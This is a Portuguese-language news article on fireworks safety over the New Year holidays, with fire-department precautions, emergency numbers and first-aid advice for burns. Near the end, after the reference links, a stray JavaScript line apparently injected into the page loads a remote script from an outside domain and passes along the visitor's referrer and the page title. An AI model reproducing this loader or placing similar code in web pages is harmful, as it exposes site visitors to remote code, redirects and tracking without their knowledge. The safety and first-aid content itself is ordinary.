Cuidados com fogos de artifícios devem ser intensificados neste período de festas | Brasília Capital

Cuidados com fogos de artifícios devem ser intensificados neste período de festas

Com a chegada das festas de fim de ano, a preocupação com lesões causadas por fogos de artifício são ainda maiores. De acordo com o ortopedista Michal Kossobudzki, as ocorrências mais comuns são as queimaduras e explosões em mãos e rosto.

 

 

 

Em sua página na Internet o Corpo de Bombeiros do Distrito Federal (CBMDF) divulga os seguintes cuidados que se deve ter com os fogos de artifício no réveillon:

– Prefira as queimas de fogos públicas, que são realizadas por profissionais. Além de proporcionarem um belo espetáculo, são mais seguras.

– Compre fogos de artifício somente em lojas especializadas e credenciadas. Os clandestinos não trazem orientações do fabricante na embalagem, geralmente não são testados e são vendidos de forma avulsa.

– Escolha sempre os fogos menos explosivos e de fácil manuseio, e confira o certificado de garantia.

– Sigas as dicas do fabricante e peça orientações de como proceder no momento da compra.

– Nunca deixe as crianças soltarem os fogos.

– Nunca faça experiências, modifique ou tente fazer seus próprios fogos de artifício.

– Evite segurá-los com as mãos. Compre artefatos que venham com a base para encaixar no suporte dos fogos de artifício, para que seja possível colocar no chão.

– Se os fogos falharem, não tente reaproveitá-los.

– Tenha sempre um recipiente de água por perto para colocar os foguetes já usados, ou aqueles que falharam, para não haver riscos de novas explosões.

– Em caso de show pirotécnico, contrate um profissional especializado.

– Bebida alcoólica não combina com fogo. Nunca manuseie os artefatos sob efeito de álcool.

– Evite guardá-los em casa: é como possuir uma bomba prestes a explodir. Se você decidir mesmo assim mantê-los para uso futuro, deixe-os em um local seco e longe de fogões, isqueiros e do acesso a fumantes.

– Distância Mínima de 30 metros de outras pessoas e de edificações.

– Não soltar debaixo de árvores, marquises, rede elétrica e locais fechados em geral.

 

Primeiros Socorros e Cuidados

Os contatos pra ligação gratuita são: Samu 192 e Bombeiros 193.

No Distrito Federal, o Hospital Regional da Asa Norte  ,é a unidade recomendada para o socorro a pessoas com queimaduras.  

A Sociedade Brasileira de  Queimaduras dá a seguinte orientação:

Primeiros socorros:

Em caso de acidente envolvendo queimaduras, o primeiro cuidado é extinguir a fonte de calor, ou seja, impedir que permaneça o contato do corpo com o fogo, líquidos e superfícies aquecidas, entre outras causas do acidente.

Em seguida, procure lavar o local atingido com água corrente em temperatura ambiente, de preferência por tempo suficiente até que a área queimada seja resfriada.

Também é importante buscar o auxílio de um profissional de saúde no posto de atendimento mais próximo do local do acidente, para que sejam tomadas as providências necessárias para o sucesso da recuperação e também para evitar o agravamento da lesão.

Se não houver Posto de Saúde nas proximidades, deve-se acionar os serviços de socorro do SAMU e do Corpo de Bombeiros ou procurar uma Emergência hospitalar.

Cuidados:

Não passe no local atingido nenhum produto ou receita caseira. Qualquer substância que seja passada sobre a pele queimada vai irritá-la. Há também o alto risco de infecção por bactérias, fungos e vírus presentes nesses produtos, já que a barreira natural do organismo – a pele – está danificada.

Não passe nenhuma pomada no local atingido. A pele fica extremamente sensível após uma queimadura e as pomadas, ainda que adquiridas em farmácias, machucam ainda mais as células cutâneas e podem irritar a pele e gerar infecções.

Não tente estourar as bolhas provocadas pela queimadura. Elas se manifestam nas queimaduras de segundo grau e devem ser manuseadas apenas por um profissional especializado. Ou seja, não devem ser rompidas, estouradas ou mesmo esvaziadas com uma agulha.

Ao retirar esse curativo natural em casa, o ferimento estará exposto a instrumentos possivelmente contaminados e pode infeccionar.Se houver necessidade de cobrir o ferimento a caminho do serviço de Saúde, o indicado é envolvê-lo num pedaço de pano limpo.

Tecidos ou materiais que grudam no ferimento, como o algodão, devem ser evitados. O paciente queimado não deve retirar a roupa que estiver usando, ainda que houver sido atingida pelo fogo. O ideal é molhar a vestimenta e permanecer assim até a chegada ao pronto-socorro, para evitar que as bolhas estourem e que a pele seja arrancada.

Outro cuidado é retirar acessórios, como pulseiras e anéis, pois o corpo incha naturalmente após uma queimadura e esses objetos podem ficar presos.

No Distrito Federal, o Hospital Regional da Asa Norte  ,é a unidade recomendada para o socorro a pessoas com queimaduras.  

Para mais informações acesse:

www.cbm.df.gov.br

http://sbqueimaduras.org.br/queimaduras-conceito-e-causas/primeiros-socorros-e-cuidados/

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte: ,

Deixe um comentário